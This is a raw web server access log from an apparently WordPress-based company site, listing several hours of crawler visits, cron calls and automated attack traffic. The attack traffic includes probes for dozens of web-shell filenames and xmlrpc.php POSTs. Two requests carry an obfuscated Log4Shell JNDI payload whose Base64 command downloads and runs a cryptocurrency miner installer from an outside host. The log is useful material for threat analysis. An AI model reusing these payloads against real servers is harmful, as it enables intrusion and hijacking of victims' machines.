149.50.103.48 - - [16/Sep/2025:06:14:31 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:06:21:58 +0800] "POST /wp-cron.php?doing_wp_cron=1757974918.1379849910736083984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
51.210.194.206 - - [16/Sep/2025:06:21:58 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [16/Sep/2025:06:39:24 +0800] "POST /wp-cron.php?doing_wp_cron=1757975964.0395720005035400390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
64.56.77.219 - - [16/Sep/2025:06:39:24 +0800] "GET /system/storage/logs/error.txt HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Googlebot/2.1 +http://www.googlebot.com/bot.html)"
64.56.77.219 - - [16/Sep/2025:06:39:24 +0800] "GET /system/logs/error.txt HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Googlebot/2.1 +http://www.googlebot.com/bot.html)"
64.56.77.219 - - [16/Sep/2025:06:39:24 +0800] "GET /storage/logs/error.txt HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Googlebot/2.1 +http://www.googlebot.com/bot.html)"
36.133.115.36 - - [16/Sep/2025:06:46:54 +0800] "POST /wp-cron.php?doing_wp_cron=1757976414.7816870212554931640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
173.252.83.9 - - [16/Sep/2025:06:46:54 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
36.133.115.36 - - [16/Sep/2025:06:48:16 +0800] "POST /wp-cron.php?doing_wp_cron=1757976496.7901589870452880859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [16/Sep/2025:06:48:16 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:07:05:10 +0800] "POST /wp-cron.php?doing_wp_cron=1757977510.3955640792846679687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [16/Sep/2025:07:05:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
52.187.150.37 - - [16/Sep/2025:07:18:30 +0800] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:30 +0800] "GET /num.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:30 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:30 +0800] "GET /makeasmtp.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:30 +0800] "GET /co.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:30 +0800] "GET /rsnu.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:30 +0800] "GET /file7.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:30 +0800] "GET /bolt.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:30 +0800] "GET /akc.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:30 +0800] "GET /file8.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:31 +0800] "GET /great.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:31 +0800] "GET /dejavu.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:31 +0800] "GET /CLA.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:31 +0800] "GET /atomlib.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:31 +0800] "GET /sder52u.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:31 +0800] "GET /wp.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:31 +0800] "GET /sh.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:31 +0800] "GET /re.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:31 +0800] "GET /nc4.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:31 +0800] "GET /file.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:31 +0800] "GET /wp-content/plugins/lwbdene/index.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:31 +0800] "GET /slo.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:31 +0800] "GET /gold.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:31 +0800] "GET /aaaa.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:32 +0800] "GET /ol.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:32 +0800] "GET /lock360.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:32 +0800] "GET /ahax.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:32 +0800] "GET /goods.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:32 +0800] "GET /gfile.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:32 +0800] "GET /we.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:32 +0800] "GET /new.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:32 +0800] "GET /bless2.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:32 +0800] "GET /file5.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:32 +0800] "GET /ss.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:32 +0800] "GET /cool.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:32 +0800] "GET /fm.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:32 +0800] "GET /wander.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:32 +0800] "GET /lo.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:33 +0800] "GET /cfile.php HTTP/1.1" 404 27 "-" "-"
52.187.150.37 - - [16/Sep/2025:07:18:33 +0800] "GET /lc.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [16/Sep/2025:07:24:14 +0800] "POST /wp-cron.php?doing_wp_cron=1757978654.9405179023742675781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [16/Sep/2025:07:24:15 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:07:25:23 +0800] "POST /wp-cron.php?doing_wp_cron=1757978723.0807878971099853515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
173.236.127.48 - - [16/Sep/2025:07:25:23 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [16/Sep/2025:07:29:17 +0800] "POST /wp-cron.php?doing_wp_cron=1757978957.4588279724121093750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.161 - - [16/Sep/2025:07:29:17 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
180.184.144.185 - - [16/Sep/2025:07:33:24 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:07:36:39 +0800] "POST /wp-cron.php?doing_wp_cron=1757979399.7133460044860839843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
18.212.80.6 - - [16/Sep/2025:07:36:39 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:07:39:54 +0800] "POST /wp-cron.php?doing_wp_cron=1757979594.7239959239959716796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.38.44.221 - - [16/Sep/2025:07:39:56 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [16/Sep/2025:07:41:59 +0800] "POST /wp-cron.php?doing_wp_cron=1757979719.5832490921020507812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.148.40 - - [16/Sep/2025:07:41:59 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:07:47:06 +0800] "POST /wp-cron.php?doing_wp_cron=1757980026.8912880420684814453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [16/Sep/2025:07:47:06 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:08:01:26 +0800] "POST /wp-cron.php?doing_wp_cron=1757980886.8928079605102539062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [16/Sep/2025:08:01:26 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:08:05:27 +0800] "POST /wp-cron.php?doing_wp_cron=1757981127.5800650119781494140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
117.33.163.216 - - [16/Sep/2025:08:05:27 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [16/Sep/2025:08:13:46 +0800] "POST /wp-cron.php?doing_wp_cron=1757981626.3829309940338134765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [16/Sep/2025:08:13:46 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:08:18:58 +0800] "POST /wp-cron.php?doing_wp_cron=1757981937.9911830425262451171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.84.253 - - [16/Sep/2025:08:18:58 +0800] "GET / HTTP/1.0" 200 141726 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [16/Sep/2025:08:23:04 +0800] "POST /wp-cron.php?doing_wp_cron=1757982184.8243520259857177734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
80.75.212.83 - - [16/Sep/2025:08:23:04 +0800] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==%7D%27%29 HTTP/1.1" 301 5 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')"
80.75.212.83 - - [16/Sep/2025:08:23:05 +0800] "GET /t%28%27%7B%7Benv:NaN:-j%7Dndi%7Benv:NaN:-:%7D%7Benv:NaN:-l%7Ddap%7Benv:NaN:-:%7D/31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg== HTTP/1.1" 404 31381 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')"
36.133.115.36 - - [16/Sep/2025:08:24:04 +0800] "POST /wp-cron.php?doing_wp_cron=1757982244.4538810253143310546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.245 - - [16/Sep/2025:08:24:04 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [16/Sep/2025:08:24:29 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
183.188.248.72 - - [16/Sep/2025:08:31:01 +0800] "POST /HNAP1/ HTTP/1.0" 400 0 "-" "-"
36.133.115.36 - - [16/Sep/2025:08:33:34 +0800] "POST /wp-cron.php?doing_wp_cron=1757982814.0769379138946533203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
123.56.163.240 - - [16/Sep/2025:08:33:34 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
123.56.163.240 - - [16/Sep/2025:08:33:34 +0800] "GET / HTTP/1.1" 200 39369 "http://36.133.115.36/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:08:35:24 +0800] "POST /wp-cron.php?doing_wp_cron=1757982924.8124730587005615234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
171.244.0.91 - - [16/Sep/2025:08:35:24 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
87.120.191.70 - - [16/Sep/2025:08:35:44 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
220.181.108.93 - - [16/Sep/2025:08:38:18 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "-" "Baiduspider-image+(+http://www.baidu.com/search/spider.htm)"
36.133.115.36 - - [16/Sep/2025:08:48:08 +0800] "POST /wp-cron.php?doing_wp_cron=1757983688.0486369132995605468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [16/Sep/2025:08:48:08 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [16/Sep/2025:08:54:06 +0800] "POST /wp-cron.php?doing_wp_cron=1757984046.3649909496307373046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [16/Sep/2025:08:54:06 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:08:59:15 +0800] "POST /wp-cron.php?doing_wp_cron=1757984355.5036320686340332031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [16/Sep/2025:08:59:15 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:09:01:16 +0800] "POST /wp-cron.php?doing_wp_cron=1757984476.2303900718688964843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
116.179.32.34 - - [16/Sep/2025:09:01:16 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fbug%2F HTTP/1.1" 200 1105 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [16/Sep/2025:09:10:55 +0800] "POST /wp-cron.php?doing_wp_cron=1757985055.6658990383148193359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [16/Sep/2025:09:10:55 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:09:23:45 +0800] "POST /wp-cron.php?doing_wp_cron=1757985825.5204169750213623046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [16/Sep/2025:09:23:45 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:09:26:56 +0800] "POST /wp-cron.php?doing_wp_cron=1757986016.4743819236755371093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.161 - - [16/Sep/2025:09:26:56 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:09:29:03 +0800] "POST /wp-cron.php?doing_wp_cron=1757986143.4184091091156005859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [16/Sep/2025:09:29:03 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:09:48:21 +0800] "POST /wp-cron.php?doing_wp_cron=1757987301.4833700656890869140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [16/Sep/2025:09:48:21 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:09:54:40 +0800] "POST /wp-cron.php?doing_wp_cron=1757987680.4763259887695312500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
132.145.196.107 - - [16/Sep/2025:09:54:41 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:96.0) Gecko/20071914 Firefox/96.0"
36.133.115.36 - - [16/Sep/2025:09:57:01 +0800] "POST /wp-cron.php?doing_wp_cron=1757987821.2052330970764160156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.22.53.94 - - [16/Sep/2025:09:57:01 +0800] "GET /.git/HEAD HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0"
42.236.17.248 - - [16/Sep/2025:10:05:09 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:10:05:13 +0800] "POST /wp-cron.php?doing_wp_cron=1757988313.4787449836730957031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.17.248 - - [16/Sep/2025:10:05:13 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
42.236.17.84 - - [16/Sep/2025:10:06:45 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:10:06:53 +0800] "POST /wp-cron.php?doing_wp_cron=1757988413.3852620124816894531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.17.84 - - [16/Sep/2025:10:06:53 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
45.142.193.144 - - [16/Sep/2025:10:07:18 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
42.236.17.117 - - [16/Sep/2025:10:08:43 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:10:08:46 +0800] "POST /wp-cron.php?doing_wp_cron=1757988526.5139539241790771484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.17.117 - - [16/Sep/2025:10:08:46 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:10:10:23 +0800] "POST /wp-cron.php?doing_wp_cron=1757988623.5283029079437255859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.166.142.76 - - [16/Sep/2025:10:10:23 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.142.76 - - [16/Sep/2025:10:10:25 +0800] "GET / HTTP/1.1" 200 33467 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [16/Sep/2025:10:12:49 +0800] "POST /wp-cron.php?doing_wp_cron=1757988769.8370070457458496093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
